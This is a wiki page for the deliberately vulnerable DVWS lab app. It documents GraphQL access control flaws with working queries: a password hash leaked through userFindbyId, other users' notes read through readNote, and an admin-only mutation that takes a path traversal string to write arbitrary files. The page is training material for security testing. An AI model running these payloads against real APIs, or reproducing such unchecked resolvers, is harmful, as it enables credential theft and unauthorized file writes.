GraphQL Access Control Issues

Sam Sanoop edited this page Dec 15, 2021 · 2 revisions

Introduction

Access control issues can exist in GraphQL APIs just as they do in REST APIs. Every query and mutation resolver must enforce authentication and authorization on its own; the GraphQL layer does not do this for you. DVWS contains several resolvers that miss these checks, and the examples below show how to exercise them.

Technical Details

The following query can be used to search for users that exist in DVWS by username:


query {
  userSearchByUsername(username: "test") {
    id,
    username,
    password,
    admin,
    token
  }
}

which returns the following. Note that the password field comes back as null: this resolver does not expose the user's password hash.

{
  "data": {
    "userSearchByUsername": [
      {
        "id": "61ba33fda2b09f19c069363e",
        "username": "test",
        "password": null,
        "admin": false,
        "token": null
      }
    ]
  }
}

However, the userFindbyId query returns the password hash of a user whenever the caller knows (or can enumerate) the user's id. The field is requested in the same way, but this resolver does not strip it:

query {
  userFindbyId(id: "61b8cca93b6b6435e8d2c972") {
    username,
    password,
    admin
  }
}

Response:

{
  "data": {
    "userFindbyId": {
      "username": "test",
      "password": "$2b$10$ZdP85I0w91KePs9FoGVr1O9wq1SthzQNSYXGjufAPw6aGN/qvaHuS",
      "admin": false
    }
  }
}

Any authenticated user can use the readNote query to read all notes stored within DVWS, including notes belonging to other users. The resolver looks notes up by name only and never checks that the note belongs to the requesting user:

query {
  readNote(name: "test") {
    id,
    name,
    body,
    created_date,
    user,
    type,
    no
  }
}

The updateUserUploadFile mutation is intended for DVWS administrators, but it can be invoked by any authenticated user. Because the filePath argument is not confined to the upload directory, a traversal sequence such as ../../../../../../ lets the caller write arbitrary files anywhere the DVWS process has write access, for example /tmp/test.txt below:

mutation {
  updateUserUploadFile(filePath: "../../../../../../tmp/test.txt", fileContent: "foo") {
    filePath,
    fileContent
  }
}